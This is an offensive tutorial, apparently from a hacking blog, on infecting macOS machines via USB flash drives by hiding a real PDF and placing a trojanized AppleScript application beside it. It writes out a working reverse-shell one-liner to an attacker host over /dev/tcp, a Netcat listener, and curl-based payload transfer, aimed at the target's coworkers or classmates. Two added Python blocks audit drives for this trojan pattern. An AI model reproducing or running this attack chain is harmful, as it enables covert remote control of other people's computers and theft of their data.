It's not uncommon for hackers to try to move laterally between devices near a compromised device in order to maintain a longer presence on the network. Malware that uses USB flash drives to self-replicate and compromise air-gapped machines is not a new concept.
Both in business and in social environments, it's common for users to exchange data via USB sticks (thumb drives, flash drives, or whatever you want to call them). After all, they were developed to store and share data. This makes them an excellent vector for distributing malicious files among large groups of employees, classmates, and individuals. By manipulating or replacing files that are already on the flash drive, we can easily mislead a target into believing that the files are benign and completely harmless.
Understanding the USB Attack
We begin by listing the USB flash drives attached to a backdoored macOS device. After identifying a suitable flash drive, we examine its contents for a file to mimic (copy). The copied file can be any PDF, image, media file or text file. The copy is hidden from the target when Finder is used to view the files on the flash drive.
A trojanized AppleScript is then created and uploaded to the target's flash drive. When the stick is removed and someone opens the trojanized AppleScript, the hidden copy is opened, which leads the target to believe the file is legitimate, while our payload runs in the background.
For this attack to succeed, one of the target's flash drives must be inserted into the backdoored macOS device. Connected USB sticks can be enumerated with the command system_profiler SPUSBDataType.
system_profiler SPUSBDataType

 1 USB 3.0 Bus:
 2     DataTraveler 3.0:
 3         Product ID: 0x1666
 4         Vendor ID: 0x0951  (Kingston Technology Company)
 5         Version: 1.00
 6         Serial Number: XXXXXXXXXXXXXXXXXXXXXXXXX
 7         Speed: Up to 5 Gb/sec
 8         Manufacturer: Kingston
 9         Location ID: 0x14400000 / 4
10         Current Available (mA): 900
11         Current Required (mA): 504
12         Extra Operating Current (mA): 0
13         Media:
14             DataTraveler 3.0:
15                 Capacity: 15.5 GB (15,502,147,584 bytes)
16                 Removable Media: Yes
17                 BSD Name: disk2
18                 Logical Unit: 0
19                 Partition Map Type: MBR (Master Boot Record)
20                 USB Interface: 0
21                 Volumes:
22                     KINGSTON:
23                         Capacity: 15.5 GB (15,498,018,816 bytes)
24                         Available: 15.36 GB (15,360,786,432 bytes)
25                         Writable: Yes
26                         File System: MS-DOS FAT32
27                         BSD Name: disk2s1
28                         Mount Point: /Volumes/KINGSTON
29                         Content: Windows_FAT_32
30                         Volume UUID: XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXXX
When accessing a flash drive for this attack, there are some important details to consider:
Whether the flash drive is read-only (line 25 above) is important. If the flash drive is read-only or a physical write-protect switch is enabled, new (trojanized) files cannot be saved to it. However, this is a rare scenario. If someone inserts a flash drive into their MacBook to store files on it, the flash drive is probably both readable and writable. Writability is something to check before proceeding.
The amount of free space (line 24 above) is important. Obviously, at least a few megabytes must be available on the flash drive to add or replace files. The flash drive in the example above has more than 15 GB of free space, but keep this in mind before writing any data to the device.
In addition, the file system format (line 26 above) should be considered. USB flash drives formatted with Apple's APFS file system take more steps to make this attack work, but that's beyond the scope of this article. In the coming weeks I will delve deeper into this topic and show why macOS is so vulnerable to USB attacks. Fortunately, the chances of encountering an APFS-formatted flash drive are slim. Flash drives formatted with NTFS, exFAT and FAT32 work perfectly. These formats are much more common on cross-platform systems and are what manufacturers pre-format drives with by default.
For a suitable flash drive, note the mount point (line 28 above) and then list (ls) its contents. My flash drive is named "KINGSTON", a name assigned by default by its manufacturer. I will use "USB-NAME-HERE" for the rest of the article. Your USB drive will probably have a completely different name (like "SanDisk" or "Samsung_USB"); remember to change it accordingly.
ls -la /Volumes/USB-NAME-HERE/

total 233280
drwxrwxrwx@  1 tokyoneon  staff     16384 Aug 19 14:03 .
drwxr-xr-x@  4 root       wheel       136 Aug 19 14:03 ..
drwxrwxrwx   1 tokyoneon  staff     16384 May 19 17:44 .Spotlight-V100
drwxrwxrwx   1 tokyoneon  staff     16384 Aug 19 14:03 .fseventsd
-rwxrwxrwx   1 tokyoneon  staff   4521984 Jun  3 21:26 DSC_0405.JPG
-rwxrwxrwx   1 tokyoneon  staff   4566375 Aug  8 20:28 DSC_0497.JPG
-rwxrwxrwx   1 tokyoneon  staff   1528811 Jun  3 21:26 Mastering Nmap Scripting Engine.pdf
-rwxrwxrwx@  1 tokyoneon  staff   3555730 Jun  3 21:26 Penetration_Testing_with_the_Bash_Shell.pdf
-rwxrwxrwx@  1 tokyoneon  staff    512055 Jul 31 00:32 Screen Shot 2018-07-31 at 12:32:27 AM.png
-rwxrwxrwx@  1 tokyoneon  staff   1585223 Aug  3 02:11 Screen Shot 2018-08-03 at 2:11:49 AM.png
drwxrwxrwx   1 tokyoneon  staff     16384 May 31 11:12 System Volume Information
-rwxrwxrwx   1 tokyoneon  staff  24335922 Jun  3 21:26 The Hacker Playbook 2 - Practical Guide to Penetration Testing.pdf
-rwxrwxrwx   1 tokyoneon  staff  14848250 Jun  3 21:26 Wireshark for Security Professionals.pdf
-rwxrwxrwx   1 tokyoneon  staff      4253 Jun 14 16:30 a.txt
-rwxrwxrwx   1 tokyoneon  staff   1622016 Jun  3 21:24 invoice_2018_april.pdf
-rwxrwxrwx@  1 tokyoneon  staff    231712 Aug 17 23:26 image5435.jpg
-rwxrwxrwx   1 tokyoneon  staff    126092 Jun  7 19:17 log.txt
-rwxrwxrwx   1 tokyoneon  staff  11681792 Jun  3 21:25 paystub.pdf
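As an added example (not part of the original article), a small Python parser for the system_profiler SPUSBDataType text shown above that pulls out exactly the fields the checklist inspects (Writable, Available, File System, Mount Point) and reports which attached volumes are removable, writable and FAT/exFAT/NTFS-formatted, which is also the list an endpoint policy that mounts removable media read-only would want to verify. The sample text is constructed from the listing above; the same functions can be fed the live output of system_profiler.

```python
import re

# Constructed sample, trimmed from the system_profiler SPUSBDataType output above
SAMPLE = """\
USB 3.0 Bus:
    DataTraveler 3.0:
        Vendor ID: 0x0951  (Kingston Technology Company)
        Media:
            DataTraveler 3.0:
                Removable Media: Yes
                BSD Name: disk2
                Volumes:
                    KINGSTON:
                        Available: 15.36 GB (15,360,786,432 bytes)
                        Writable: Yes
                        File System: MS-DOS FAT32
                        Mount Point: /Volumes/KINGSTON
"""

def parse_profile(text):
    """Turn system_profiler's indented 'Key: Value' text into nested dicts."""
    root, stack = {}, [(-1, {})]
    stack[0] = (-1, root)
    for raw in text.splitlines():
        if not raw.strip():
            continue
        indent = len(raw) - len(raw.lstrip())
        key, _, val = raw.strip().partition(":")
        while indent <= stack[-1][0]:      # close nodes indented deeper than this line
            stack.pop()
        parent = stack[-1][1]
        if val.strip():
            parent[key] = val.strip()
        else:                              # a line ending in ':' opens a sub-node
            parent[key] = node = {}
            stack.append((indent, node))
    return root

def removable_volumes(text):
    """List mounted volumes with the fields the checklist above inspects."""
    found = []
    def walk(node, removable):
        removable = removable or node.get("Removable Media") == "Yes"
        if "Mount Point" in node:
            m = re.search(r"\(([\d,]+) bytes\)", node.get("Available", ""))
            found.append({"mount": node["Mount Point"], "removable": removable,
                          "fs": node.get("File System", "unknown"),
                          "writable": node.get("Writable") == "Yes",
                          "available_bytes": int(m.group(1).replace(",", "")) if m else 0})
        for child in node.values():
            if isinstance(child, dict):
                walk(child, removable)     # 'Removable Media' is set on the parent device
    walk(parse_profile(text), False)
    return found

def writable_removable(text, fs_prefixes=("MS-DOS", "ExFAT", "NTFS")):
    """Volumes that are removable, writable and cross-platform formatted."""
    return [v for v in removable_volumes(text)
            if v["removable"] and v["writable"] and v["fs"].startswith(fs_prefixes)]
```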
Step 2: Prepare Files on the USB Stick
Any PDF, image, media file, or text file can be used for this attack. Remember, the idea is to take an existing file and replace it with a nefarious file of our own creation. If the file is opened on another computer, a backdoor is created and the device becomes remotely accessible to us.
Readers should familiarize themselves with one of my previous articles, "Creating a Fake PDF Trojan with AppleScript". There I show in more detail how AppleScript is used to present a legitimate PDF. If there are no PDF files on the target's USB flash drive, the same technique can be used to create counterfeit media and text files.
I will trojanize the PDF file "Mastering Nmap Scripting Engine" on the flash drive. But remember, the more files we trojanize, the more likely someone will click on one and run the payload embedded in the AppleScript.
Use the following command to hide the chosen file by moving (mv) it:
mv '/Volumes/USB-NAME-HERE/Mastering Nmap Scripting Engine.pdf' '/Volumes/USB-NAME-HERE/.Mastering Nmap Scripting Engine.pdf'
The dot (.) prefixed to ".Mastering" is very important. In macOS, files whose names begin with a dot are hidden in Finder. This Finder setting is the default in all versions of macOS. Some users choose to show hidden files, but this option must be set manually, which reduces the likelihood of it being enabled.
Step 3: Starting a Netcat Listener
Before we start creating the AppleScript, open a terminal in Kali (or any Unix-based operating system with Netcat installed) and use the following command to start a Netcat listener. A connection to this listener is established when the trojanized AppleScript is opened.
nc -l -p 9999
Netcat opens a listening port (-l) on every available interface. If you are working on a local network, the Netcat listener is reachable at your local address (for example, 192.168.0.X). If the listener is started on a virtual private server (VPS), you must use the IP address of your VPS in the later commands. The port (-p) number (9999) is arbitrary and can be changed to any number below 65535.
Step 4: Creating a Trojanized AppleScript Application
Now, with the genuine PDF hidden, we can create our nefarious AppleScript to mimic the Nmap PDF. Unfortunately, this method requires Script Editor, a scripting application found only in macOS. Readers who do not have access to a MacBook or other Mac computer should look into the Empire AppleScript stager.
In macOS, open Script Editor, create a "New Document" and paste the following one-liner into it.
do shell script "open '/Volumes/USB-NAME-HERE/.Mastering Nmap Scripting Engine.pdf' -a Preview.app; /bin/bash -i >& /dev/tcp/1.2.3.4/9999 0>&1 &"
To direct AppleScript to execute shell commands, the line begins with do shell script. The AppleScript first opens the specified PDF ('/Volumes/USB-NAME-HERE/.Mastering Nmap Scripting Engine.pdf') with the macOS Preview application (-a Preview.app). Then (;) it silently connects Bash (/bin/bash -i >& /dev/tcp/... 0>&1 &) to the Netcat listener so the attacker can remotely send commands to the device.
The attacker's IP address (1.2.3.4) may be a local IP address (for example, 192.168.1.45). However, this type of attack is probably most effective with a VPS, in which case replace 1.2.3.4 with the IP address of your VPS. Whichever IP address you use, it should point to the system where the Netcat listener is running. The port number (9999) should likewise be changed to match the port used by the Netcat listener.
When that's done, click "File" on the menu bar and then click "Export." Save the script with the file format "Application".
At this point, the file icon and file extension should be correctly disguised. This was covered in detail in my article "Creating a Fake PDF Trojan with AppleScript", so I'll skip it here.
Step 5: Transfer the Trojanized File to the Target's Flash Drive
The fake Nmap PDF we've just created on our macOS device needs to be moved to the target's USB flash drive. To accomplish this, we use tar, a command-line tool, to compress the file. Then we upload it to a file-sharing site so it can be downloaded from the target's MacBook.
Open a terminal and compress the fake PDF with the following tar command:
tar -czvf outputFile.tar.gz 'Mastering Nmap Scripting Engine.app/'

a Mastering Nmap Scripting Engine.app
a Mastering Nmap Scripting Engine.app/Contents
a Mastering Nmap Scripting Engine.app/Contents/Info.plist
a Mastering Nmap Scripting Engine.app/Contents/MacOS
a Mastering Nmap Scripting Engine.app/Contents/PkgInfo
a Mastering Nmap Scripting Engine.app/Contents/Resources
a Mastering Nmap Scripting Engine.app/Contents/Resources/applet.icns
a Mastering Nmap Scripting Engine.app/Contents/Resources/applet.rsrc
a Mastering Nmap Scripting Engine.app/Contents/Resources/description.rtfd
a Mastering Nmap Scripting Engine.app/Contents/Resources/Scripts
a Mastering Nmap Scripting Engine.app/Contents/Resources/Scripts/main.scpt
a Mastering Nmap Scripting Engine.app/Contents/Resources/description.rtfd/TXT.rtf
a Mastering Nmap Scripting Engine.app/Contents/MacOS/applet
Tar creates (-c) a gzip-compressed (-z) .tar.gz output file (similar to a ZIP file) from the file or directory we specify (-f), listing each entry as it is archived (-v). In this case, I am using the fake Nmap Trojan we just created. When done, upload the outputFile.tar.gz file to the Pb pastebin with the following cURL command. Pb is generally my preferred way to transfer files, but if you're comfortable with another file-sharing site, that should work just as well.
curl -F c=@- 'https://ptpb.pw' < outputFile.tar.gz

short: AB12
size: 49270
status: created
url: https://ptpb.pw/AB12
Similar to other file-sharing sites, Pb returns a short four-character URL (AB12) from which the fake PDF can be downloaded. Now, on the backdoored MacBook, the following command can be executed to download and extract the fake PDF onto the desired USB flash drive.
curl 'https://ptpb.pw/AB12' | tar xv

  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 49270  100 49270    0     0   9307      0  0:00:05  0:00:05 --:--:-- 14145
x ./._Mastering Nmap Scripting Engine.app
x Mastering Nmap Scripting Engine.app/
x Mastering Nmap Scripting Engine.app/Contents/
x Mastering Nmap Scripting Engine.app/Contents/Info.plist
x Mastering Nmap Scripting Engine.app/Contents/MacOS/
x Mastering Nmap Scripting Engine.app/Contents/PkgInfo
x Mastering Nmap Scripting Engine.app/Contents/Resources/
x Mastering Nmap Scripting Engine.app/Contents/Resources/applet.icns
x Mastering Nmap Scripting Engine.app/Contents/Resources/applet.rsrc
x Mastering Nmap Scripting Engine.app/Contents/Resources/description.rtfd/
x Mastering Nmap Scripting Engine.app/Contents/Resources/Scripts/
x Mastering Nmap Scripting Engine.app/Contents/Resources/Scripts/main.scpt
x Mastering Nmap Scripting Engine.app/Contents/Resources/description.rtfd/TXT.rtf
x Mastering Nmap Scripting Engine.app/Contents/MacOS/applet
The compressed archive is downloaded with cURL, piped to tar for extraction (xv), and saved to the flash drive. A target who uses Finder to view the contents of the flash drive sees just a harmless Nmap PDF.
When the fake PDF is opened by the target on another computer, or by the target's coworkers, it connects back to the Netcat listener. If we use ls again to display the contents of the target's flash drive, we can see that two entries now share the same base name.
ls -la /Volumes/USB-NAME-HERE/

drwxrwxrwx@  1 tokyoneon  staff     16384 Aug 19 14:03 .
drwxr-xr-x@  4 root       wheel       136 Aug 19 14:03 ..
drwxrwxrwx   1 tokyoneon  staff     16384 May 19 17:44 .Spotlight-V100
drwxrwxrwx   1 tokyoneon  staff     16384 Aug 19 14:03 .fseventsd
-rwxrwxrwx   1 tokyoneon  staff   4521984 Jun  3 21:26 DSC_0405.JPG
-rwxrwxrwx   1 tokyoneon  staff   4566375 Aug  8 20:28 DSC_0497.JPG
-rwxrwxrwx   1 tokyoneon  staff   1528811 Jun  3 21:26 .Mastering Nmap Scripting Engine.pdf
-rwxrwxrwx@  1 tokyoneon  staff   3555730 Jun  3 21:26 Penetration_Testing_with_the_Bash_Shell.pdf
-rwxrwxrwx@  1 tokyoneon  staff    512055 Jul 31 00:32 Screen Shot 2018-07-31 at 12:32:27 AM.png
-rwxrwxrwx@  1 tokyoneon  staff   1585223 Aug  3 02:11 Screen Shot 2018-08-03 at 2:11:49 AM.png
drwxrwxrwx   1 tokyoneon  staff     16384 May 31 11:12 System Volume Information
-rwxrwxrwx   1 tokyoneon  staff  24335922 Jun  3 21:26 The Hacker Playbook 2 - Practical Guide to Penetration Testing.pdf
-rwxrwxrwx   1 tokyoneon  staff  14848250 Jun  3 21:26 Wireshark for Security Professionals.pdf
-rwxrwxrwx   1 tokyoneon  staff      4253 Jun 14 16:30 a.txt
-rwxrwxrwx   1 tokyoneon  staff   1622016 Jun  3 21:24 invoice_2018_april.pdf
-rwxrwxrwx@  1 tokyoneon  staff    231712 Aug 17 23:26 image5435.jpg
-rwxrwxrwx   1 tokyoneon  staff    126092 Jun  7 19:17 log.txt
-rwxrwxrwx   1 tokyoneon  staff  11681792 Jun  3 21:25 paystub.pdf
drwxrwxrwx@  1 tokyoneon  staff       16K Aug 19 19:56 Mastering Nmap Scripting Engine.app/
"Mastering Nmap Scripting Engine.app/" is the Trojan, which appears to the target as an ordinary PDF. Also on the flash drive is ".Mastering Nmap Scripting Engine.pdf", the real PDF that the Trojan opens to make the target believe the file is a normal PDF.
File extensions cannot be hidden from Terminal commands. If in doubt, use ls to display the files on a USB flash drive, try renaming files on the drive to reveal odd Unicode tricks, and be suspicious of pairs of files that share the same name.
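To turn that advice into a repeatable check, here is an added Python example (not from the original article) that audits a volume listing for the exact pattern described above: an .app bundle sitting on removable media, an .app whose name matches a hidden dot-file document, and names carrying zero-width or bidirectional control characters. The sample listing is constructed from the ls output above; audit_volume() runs the same checks against a real mount point such as /Volumes/USB-NAME-HERE.

```python
import os

DOC_EXTS = {".pdf", ".jpg", ".jpeg", ".png", ".txt", ".docx", ".mp4", ".mov"}
# Zero-width and bidi-control code points that make a name look different from what it is
INVISIBLE = {0x200B, 0x200C, 0x200D, 0x200E, 0x200F, 0x202A, 0x202B, 0x202C,
             0x202D, 0x202E, 0x2066, 0x2067, 0x2068, 0x2069, 0xFEFF}

def audit_listing(names):
    """Return (name, reason) pairs for entries matching the trojan pattern described
    in the article: an .app bundle on removable media, an .app whose name matches a
    hidden dot-file document, or a name containing invisible/bidi characters."""
    findings, hidden_docs = [], {}
    for n in names:
        stem, ext = os.path.splitext(n[1:])
        # ".Mastering Nmap Scripting Engine.pdf" style entries; skip AppleDouble "._" files
        if n.startswith(".") and not n.startswith("._") and ext.lower() in DOC_EXTS:
            hidden_docs[stem.lower()] = n
    for n in names:
        stem, ext = os.path.splitext(n.rstrip("/"))
        if ext.lower() == ".app":
            reason = "application bundle on removable media"
            twin = hidden_docs.get(stem.lower())
            if twin:
                reason += f", with hidden document twin {twin!r}"
            findings.append((n, reason))
        if any(ord(c) in INVISIBLE for c in n):
            findings.append((n, "invisible or bidi control character in name"))
    return findings

def audit_volume(mount_point):
    """Run the same checks against a real mounted volume."""
    return audit_listing(os.listdir(mount_point))

# Constructed listing modelled on the ls output above (not read from a real volume)
SAMPLE_LISTING = [
    ".Spotlight-V100", ".fseventsd", "DSC_0405.JPG", "invoice_2018_april.pdf",
    ".Mastering Nmap Scripting Engine.pdf", "Mastering Nmap Scripting Engine.app/",
    "Penetration_Testing_with_the_Bash_Shell.pdf",
    "paystub\u200b.pdf",  # constructed: a zero-width space hidden inside the name
]

if __name__ == "__main__":
    for name, reason in audit_listing(SAMPLE_LISTING):
        print(f"{name!r}: {reason}")
```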